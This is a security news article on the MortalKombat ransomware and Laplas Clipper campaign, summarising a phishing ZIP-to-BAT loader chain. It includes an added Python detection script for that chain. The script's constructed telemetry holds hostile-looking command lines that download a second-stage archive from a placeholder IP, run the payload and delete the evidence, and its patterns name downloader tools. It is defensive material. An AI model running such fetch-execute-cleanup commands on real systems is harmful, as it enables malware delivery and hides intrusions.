A financially motivated campaign has been identified that pairs a modified variant of the Xorist ransomware family, dubbed “MortalKombat”, with the Laplas Clipper malware. The campaign has primarily targeted victims in the United States, along with individuals in the United Kingdom, Turkey, and the Philippines.
According to a recent advisory from Cisco Talos, the threat actors behind this campaign are focused on stealing cryptocurrency from their victims. The utilization of cryptocurrency provides these attackers with benefits such as anonymity, decentralization, and a lack of regulation, making it a more challenging task to trace their activities.
The attackers scan the internet for machines with an exposed Remote Desktop Protocol (RDP) service (TCP port 3389 by default). The ransomware is staged on a download server under their control, from which it is delivered to the systems they identify.
The attack typically begins with a phishing email that sets off a multi-stage chain ending in the delivery of malware or ransomware to the victim’s device. The ZIP file attached to the email contains a BAT loader script. When executed, the script downloads a second malicious ZIP file from the attacker’s server, extracts it, and runs the payload it contains: either the Laplas Clipper malware or the MortalKombat ransomware.
After the payload runs, the loader script deletes the downloaded archive and the files it dropped, removing evidence of the infection chain. To counter such attacks, Cisco Talos recommends that organizations exercise caution when engaging in cryptocurrency transactions and strengthen their defenses against email phishing.
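The four-stage loader behaviour described above (BAT script launched from a ZIP, download, extraction, payload execution, cleanup) is something a detection engineer can hunt for in endpoint process-creation telemetry. The following Python is an added example, not code from the Talos advisory or from the campaign itself. It runs over constructed process events whose fields loosely mirror Sysmon Event ID 1 (ProcessCreate); the field names, the `Temp\Temp1_<archive>.zip\` extraction path used by Windows Explorer, the downloader and extractor command lines, and the IP address and file names in the sample are all assumptions of this example and not indicators from the advisory.

```python
"""Flag a BAT loader run from a ZIP that then downloads, extracts, executes and cleans up.

Example detection logic, not from the advisory. Sample events below are constructed.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    ts: int        # seconds since epoch
    pid: int
    ppid: int
    image: str     # full path of the executed image
    cmdline: str


# Stage patterns (assumptions of this example; tune to your own telemetry).
# Explorer extracts a file opened straight out of a ZIP to %TEMP%\Temp<N>_<archive>.zip\.
BAT_FROM_ARCHIVE = re.compile(r'cmd\.exe.*\\Temp\\Temp\d+_[^\\]+\.zip\\[^"]*\.bat', re.I)
DOWNLOAD = re.compile(
    r'(curl(\.exe)?\s|certutil(\.exe)?\s.*-urlcache|bitsadmin\s.*/transfer'
    r'|powershell.*(DownloadFile|Invoke-WebRequest|\biwr\b))', re.I)
EXTRACT = re.compile(r'(tar(\.exe)?\s+-x|Expand-Archive|7z(\.exe)?\s+[xe]\s)', re.I)
PAYLOAD = re.compile(r'\\AppData\\Local\\Temp\\[^"]*\.exe$', re.I)   # image path, not cmdline
CLEANUP = re.compile(r'(\bdel\b|\berase\b|Remove-Item).*(\.zip|\.bat|\.exe)', re.I)


def descendants(events, root_pid):
    """All processes below root_pid in the parent/child tree, oldest first.
    PID reuse is ignored here; real telemetry should key on a process GUID."""
    by_parent = {}
    for e in events:
        by_parent.setdefault(e.ppid, []).append(e)
    out, stack, seen = [], [root_pid], set()
    while stack:
        parent = stack.pop()
        for child in by_parent.get(parent, []):
            if child.pid in seen:
                continue
            seen.add(child.pid)
            out.append(child)
            stack.append(child.pid)
    return sorted(out, key=lambda e: e.ts)


def detect_loader_chains(events, window_s=600, min_stages=3):
    """Return one alert per BAT-from-ZIP loader whose children hit >= min_stages stages."""
    alerts = []
    for loader in events:
        if not BAT_FROM_ARCHIVE.search(loader.cmdline):
            continue
        stages = []
        for child in descendants(events, loader.pid):
            if child.ts - loader.ts > window_s:
                continue
            if DOWNLOAD.search(child.cmdline):
                stages.append("download")
            elif EXTRACT.search(child.cmdline):
                stages.append("extract")
            elif PAYLOAD.search(child.image):
                stages.append("payload")
            elif CLEANUP.search(child.cmdline):
                stages.append("cleanup")
        ordered = list(dict.fromkeys(stages))   # de-duplicate, keep first-seen order
        if len(ordered) >= min_stages:
            alerts.append({"loader_pid": loader.pid, "cmdline": loader.cmdline,
                           "stages": ordered})
    return alerts


# Constructed sample telemetry: one malicious chain, one benign build script.
T = r"C:\Users\alice\AppData\Local\Temp"
SAMPLE_EVENTS = [
    ProcEvent(1000, 4001, 3000, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(1001, 4100, 4001, r"C:\Windows\System32\cmd.exe",
              rf'cmd.exe /c ""{T}\Temp1_receipt.zip\receipt.bat""'),
    ProcEvent(1002, 4101, 4100, r"C:\Windows\System32\curl.exe",
              rf"curl.exe -s -o {T}\stage2.zip http://198.51.100.23/stage2.zip"),
    ProcEvent(1004, 4102, 4100, r"C:\Windows\System32\tar.exe",
              rf"tar.exe -xf {T}\stage2.zip -C {T}"),
    ProcEvent(1005, 4103, 4100, rf"{T}\payload.exe", rf"{T}\payload.exe"),
    ProcEvent(1006, 4104, 4100, r"C:\Windows\System32\cmd.exe",
              rf"cmd.exe /c del /q {T}\stage2.zip {T}\payload.exe"),
    # Benign: a developer runs a build script that fetches a dependency archive.
    ProcEvent(2000, 5100, 4001, r"C:\Windows\System32\cmd.exe", r"cmd.exe /c C:\src\proj\build.bat"),
    ProcEvent(2001, 5101, 5100, r"C:\Windows\System32\curl.exe", "curl.exe -O https://example.org/deps.zip"),
]

if __name__ == "__main__":
    for alert in detect_loader_chains(SAMPLE_EVENTS):
        print(f"loader pid {alert['loader_pid']}: stages {alert['stages']}")
```

Requiring several distinct stages under a single loader process, rather than alerting on any BAT file or any `curl.exe` invocation, is what keeps the benign build script in the sample quiet; the cleanup stage in particular is worth keeping in the rule because it is the step that makes after-the-fact disk forensics harder, so catching it live from process telemetry matters.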
Erich Kron, a security awareness advocate at KnowBe4, emphasizes the importance of restricting the use of .ZIP files in emails to mitigate the risk of malware spread. By disallowing these types of archive files, organizations can enhance their defense mechanisms against phishing campaigns like the one described in the advisory.
Phishing attacks continue to be a prevalent threat, as highlighted in a recent report by Cofense, which noted an 800% increase in the use of Telegram bots as destinations for stolen information between 2021 and 2022. This underscores the importance of implementing robust cybersecurity measures to safeguard against evolving cyber threats.